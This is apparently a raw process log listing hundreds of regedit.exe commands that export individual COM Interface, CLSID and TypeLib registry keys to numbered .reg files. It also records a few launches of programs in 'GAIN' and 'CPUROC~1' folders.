/e "484.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BE-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "485.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BD-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "486.reg" "HKEY_CLASSES_ROOT\Interface\{000C03BC-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "487.reg" "HKEY_CLASSES_ROOT\Interface\{000C0393-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "488.reg" "HKEY_CLASSES_ROOT\Interface\{000C037D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "489.reg" "HKEY_CLASSES_ROOT\Interface\{000C037C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "490.reg" "HKEY_CLASSES_ROOT\Interface\{000C037B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "491.reg" "HKEY_CLASSES_ROOT\Interface\{000C037E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "492.reg" "HKEY_CLASSES_ROOT\Interface\{000C0381-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "493.reg" "HKEY_CLASSES_ROOT\Interface\{000C0380-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "494.reg" "HKEY_CLASSES_ROOT\Interface\{000C037F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "495.reg" "HKEY_CLASSES_ROOT\Interface\{000C0375-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "496.reg" "HKEY_CLASSES_ROOT\Interface\{000C0373-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "497.reg" "HKEY_CLASSES_ROOT\Interface\{000C0372-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "498.reg" "HKEY_CLASSES_ROOT\Interface\{000C0376-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "499.reg" "HKEY_CLASSES_ROOT\Interface\{000C037A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "500.reg" "HKEY_CLASSES_ROOT\Interface\{000C0379-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "501.reg" "HKEY_CLASSES_ROOT\Interface\{000C0377-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "502.reg" "HKEY_CLASSES_ROOT\Interface\{000C038E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "503.reg" "HKEY_CLASSES_ROOT\Interface\{000C038C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "504.reg" "HKEY_CLASSES_ROOT\Interface\{000C038B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "505.reg" "HKEY_CLASSES_ROOT\Interface\{000C038F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "506.reg" "HKEY_CLASSES_ROOT\Interface\{000C0392-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "507.reg" "HKEY_CLASSES_ROOT\Interface\{000C0391-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "508.reg" "HKEY_CLASSES_ROOT\Interface\{000C0390-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "509.reg" "HKEY_CLASSES_ROOT\Interface\{000C0386-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "510.reg" "HKEY_CLASSES_ROOT\Interface\{000C0385-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "511.reg" "HKEY_CLASSES_ROOT\Interface\{000C0382-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "512.reg" "HKEY_CLASSES_ROOT\Interface\{000C0387-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\PROGRA~2\GAIN\fsg.exe

"C:\PROGRA~2\GAIN\fsg.exe"

\??\c:\program files (x86)\gain\fsg_4201a.exe

"c:\program files (x86)\gain\fsg_4201a.exe"

C:\Windows\SysWOW64\regedit.exe

/e "513.reg" "HKEY_CLASSES_ROOT\Interface\{000C038A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "514.reg" "HKEY_CLASSES_ROOT\Interface\{000C0389-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "515.reg" "HKEY_CLASSES_ROOT\Interface\{000C0388-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "516.reg" "HKEY_CLASSES_ROOT\Interface\{000C1709-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "517.reg" "HKEY_CLASSES_ROOT\Interface\{000C1534-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "518.reg" "HKEY_CLASSES_ROOT\Interface\{000C1533-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "519.reg" "HKEY_CLASSES_ROOT\Interface\{000C170B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "520.reg" "HKEY_CLASSES_ROOT\Interface\{000C1711-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "521.reg" "HKEY_CLASSES_ROOT\Interface\{000C1710-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "522.reg" "HKEY_CLASSES_ROOT\Interface\{000C170F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "523.reg" "HKEY_CLASSES_ROOT\Interface\{000C0936-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "524.reg" "HKEY_CLASSES_ROOT\Interface\{000C0914-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "525.reg" "HKEY_CLASSES_ROOT\Interface\{000C0913-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "526.reg" "HKEY_CLASSES_ROOT\Interface\{000C101D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "527.reg" "HKEY_CLASSES_ROOT\Interface\{000C1532-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "528.reg" "HKEY_CLASSES_ROOT\Interface\{000C1531-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "529.reg" "HKEY_CLASSES_ROOT\Interface\{000C1530-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "530.reg" "HKEY_CLASSES_ROOT\Interface\{000C1723-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "531.reg" "HKEY_CLASSES_ROOT\Interface\{000C171C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "532.reg" "HKEY_CLASSES_ROOT\Interface\{000C171B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "533.reg" "HKEY_CLASSES_ROOT\Interface\{000C1724-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "534.reg" "HKEY_CLASSES_ROOT\Interface\{000C1727-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "535.reg" "HKEY_CLASSES_ROOT\Interface\{000C1726-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "536.reg" "HKEY_CLASSES_ROOT\Interface\{000C1725-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "537.reg" "HKEY_CLASSES_ROOT\Interface\{000C1714-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "538.reg" "HKEY_CLASSES_ROOT\Interface\{000C1713-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "539.reg" "HKEY_CLASSES_ROOT\Interface\{000C1712-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "540.reg" "HKEY_CLASSES_ROOT\Interface\{000C1715-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "541.reg" "HKEY_CLASSES_ROOT\Interface\{000C1718-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "542.reg" "HKEY_CLASSES_ROOT\Interface\{000C1717-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "543.reg" "HKEY_CLASSES_ROOT\Interface\{000C1716-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "544.reg" "HKEY_CLASSES_ROOT\Interface\{000C0411-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "545.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CF-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "546.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CE-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "547.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CD-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "548.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D0-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "549.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "550.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "551.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "552.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C8-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "553.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C7-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "554.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C6-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "555.reg" "HKEY_CLASSES_ROOT\Interface\{000C03C9-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "556.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CC-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "557.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CB-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "558.reg" "HKEY_CLASSES_ROOT\Interface\{000C03CA-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "559.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E5-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "560.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E4-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "561.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E3-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "562.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E6-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "563.reg" "HKEY_CLASSES_ROOT\Interface\{000C0410-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "564.reg" "HKEY_CLASSES_ROOT\Interface\{000C03F1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "565.reg" "HKEY_CLASSES_ROOT\Interface\{000C03F0-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "566.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D6-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "567.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D5-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "568.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D4-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "569.reg" "HKEY_CLASSES_ROOT\Interface\{000C03D7-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "570.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E2-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "571.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E1-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "572.reg" "HKEY_CLASSES_ROOT\Interface\{000C03E0-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "573.reg" "HKEY_CLASSES_ROOT\Interface\{000C0371-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "574.reg" "HKEY_CLASSES_ROOT\Interface\{0002E18C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "575.reg" "HKEY_CLASSES_ROOT\Interface\{0002E188-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "576.reg" "HKEY_CLASSES_ROOT\Interface\{0002E17E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "577.reg" "HKEY_CLASSES_ROOT\Interface\{000672AC-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "578.reg" "HKEY_CLASSES_ROOT\Interface\{000C0301-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "579.reg" "HKEY_CLASSES_ROOT\Interface\{000C0300-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "580.reg" "HKEY_CLASSES_ROOT\Interface\{000672AD-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "581.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "582.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16B-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "583.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "584.reg" "HKEY_CLASSES_ROOT\Interface\{0002E16E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "585.reg" "HKEY_CLASSES_ROOT\Interface\{0002E17A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "586.reg" "HKEY_CLASSES_ROOT\Interface\{0002E176-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "587.reg" "HKEY_CLASSES_ROOT\Interface\{0002E172-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "588.reg" "HKEY_CLASSES_ROOT\Interface\{000C0311-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "589.reg" "HKEY_CLASSES_ROOT\Interface\{000C0310-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "590.reg" "HKEY_CLASSES_ROOT\Interface\{000C030E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "591.reg" "HKEY_CLASSES_ROOT\Interface\{000C0312-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "592.reg" "HKEY_CLASSES_ROOT\Interface\{000C0315-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "593.reg" "HKEY_CLASSES_ROOT\Interface\{000C0314-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "594.reg" "HKEY_CLASSES_ROOT\Interface\{000C0313-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "595.reg" "HKEY_CLASSES_ROOT\Interface\{000C0306-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "596.reg" "HKEY_CLASSES_ROOT\Interface\{000C0304-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "597.reg" "HKEY_CLASSES_ROOT\Interface\{000C0302-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "598.reg" "HKEY_CLASSES_ROOT\Interface\{000C0308-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "599.reg" "HKEY_CLASSES_ROOT\Interface\{000C030D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "600.reg" "HKEY_CLASSES_ROOT\Interface\{000C030C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "601.reg" "HKEY_CLASSES_ROOT\Interface\{000C030A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "602.reg" "HKEY_CLASSES_ROOT\Interface\{0002E167-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "603.reg" "HKEY_CLASSES_ROOT\Interface\{00000500-0000-0010-8000-00AA006D2EA4}\ProxyStubClsid"

C:\PROGRA~2\CPUROC~1\CPUROC~1.EXE

"C:\PROGRA~2\CPUROC~1\CPUROC~1.EXE"

C:\Windows\SysWOW64\regedit.exe

/e "604.reg" "HKEY_CLASSES_ROOT\TypeLib\{F2A7EE29-8BF6-4a6d-83F1-098E366C709C}\1.0\HelpDir"

C:\Windows\SysWOW64\regedit.exe

/e "605.reg" "HKEY_CLASSES_ROOT\TypeLib\{7CD06992-50AA-11D1-B8F0-00A0C9259304}\1.0\HelpDir"

C:\Windows\SysWOW64\regedit.exe

/e "606.reg" "HKEY_CLASSES_ROOT\Interface\{00000500-0000-0010-8000-00AA006D2EA4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "607.reg" "HKEY_CLASSES_ROOT\Interface\{0002E115-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "608.reg" "HKEY_CLASSES_ROOT\Interface\{0002E113-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "609.reg" "HKEY_CLASSES_ROOT\Interface\{0002E103-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "610.reg" "HKEY_CLASSES_ROOT\CLSID\{663e1a94-a37e-4e8a-9e55-5354b2139790}\InprocServer32"

C:\Windows\SysWOW64\regedit.exe

/e "611.reg" "HKEY_CLASSES_ROOT\CLSID\{3F052B8E-512B-419D-9E06-9B9ADDC7118C}\InprocServer32"

C:\Windows\SysWOW64\regedit.exe

/e "612.reg" "HKEY_CLASSES_ROOT\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32"

C:\Windows\SysWOW64\regedit.exe

/e "613.reg" "HKEY_CLASSES_ROOT\TypeLib\{0002E157-0000-0000-C000-000000000046}\5.3\HelpDir"

C:\Windows\SysWOW64\regedit.exe

/e "614.reg" "HKEY_CLASSES_ROOT\TypeLib\{41738EEA-442F-477F-92CF-2889BD6CD7E7}\1.0\HelpDir"

C:\Windows\SysWOW64\regedit.exe

/e "615.reg" "HKEY_CLASSES_ROOT\TypeLib\{3120BA9F-4FC8-4A4F-AE1E-02114F421D0A}\1.0\HelpDir"

C:\Windows\SysWOW64\regedit.exe

/e "616.reg" "HKEY_CLASSES_ROOT\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.1\HelpDir"

C:\Windows\SysWOW64\regedit.exe

/e "617.reg" "HKEY_CLASSES_ROOT\Interface\{0002E162-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "618.reg" "HKEY_CLASSES_ROOT\Interface\{0002E161-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "619.reg" "HKEY_CLASSES_ROOT\Interface\{0002E160-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "620.reg" "HKEY_CLASSES_ROOT\Interface\{0002E163-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "621.reg" "HKEY_CLASSES_ROOT\Interface\{0002E166-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "622.reg" "HKEY_CLASSES_ROOT\Interface\{0002E165-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "623.reg" "HKEY_CLASSES_ROOT\Interface\{0002E164-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "624.reg" "HKEY_CLASSES_ROOT\Interface\{0002E11A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "625.reg" "HKEY_CLASSES_ROOT\Interface\{0002E118-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "626.reg" "HKEY_CLASSES_ROOT\Interface\{0002E116-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "627.reg" "HKEY_CLASSES_ROOT\Interface\{0002E130-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "628.reg" "HKEY_CLASSES_ROOT\Interface\{0002E159-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "629.reg" "HKEY_CLASSES_ROOT\Interface\{0002E158-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "630.reg" "HKEY_CLASSES_ROOT\Interface\{0002E131-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "631.reg" "HKEY_CLASSES_ROOT\Interface\{000C0358-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "632.reg" "HKEY_CLASSES_ROOT\Interface\{000C0357-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "633.reg" "HKEY_CLASSES_ROOT\Interface\{000C0356-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "634.reg" "HKEY_CLASSES_ROOT\Interface\{000C0359-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "635.reg" "HKEY_CLASSES_ROOT\Interface\{000C0361-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "636.reg" "HKEY_CLASSES_ROOT\Interface\{000C0360-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "637.reg" "HKEY_CLASSES_ROOT\Interface\{000C035A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "638.reg" "HKEY_CLASSES_ROOT\Interface\{000C0341-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "639.reg" "HKEY_CLASSES_ROOT\Interface\{000C0340-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "640.reg" "HKEY_CLASSES_ROOT\Interface\{000C033E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "641.reg" "HKEY_CLASSES_ROOT\Interface\{000C0351-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "642.reg" "HKEY_CLASSES_ROOT\Interface\{000C0354-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "643.reg" "HKEY_CLASSES_ROOT\Interface\{000C0353-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "644.reg" "HKEY_CLASSES_ROOT\Interface\{000C0352-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "645.reg" "HKEY_CLASSES_ROOT\Interface\{000C036C-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "646.reg" "HKEY_CLASSES_ROOT\Interface\{000C036A-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "647.reg" "HKEY_CLASSES_ROOT\Interface\{000C0369-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "648.reg" "HKEY_CLASSES_ROOT\Interface\{000C036D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "649.reg" "HKEY_CLASSES_ROOT\Interface\{000C0370-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "650.reg" "HKEY_CLASSES_ROOT\Interface\{000C036F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "651.reg" "HKEY_CLASSES_ROOT\Interface\{000C036E-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "652.reg" "HKEY_CLASSES_ROOT\Interface\{000C0364-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "653.reg" "HKEY_CLASSES_ROOT\Interface\{000C0363-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "654.reg" "HKEY_CLASSES_ROOT\Interface\{000C0362-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "655.reg" "HKEY_CLASSES_ROOT\Interface\{000C0365-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "656.reg" "HKEY_CLASSES_ROOT\Interface\{000C0368-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "657.reg" "HKEY_CLASSES_ROOT\Interface\{000C0367-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "658.reg" "HKEY_CLASSES_ROOT\Interface\{000C0366-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "659.reg" "HKEY_CLASSES_ROOT\Interface\{000C033D-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "660.reg" "HKEY_CLASSES_ROOT\Interface\{000C031F-0000-0000-C000-000000000046}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

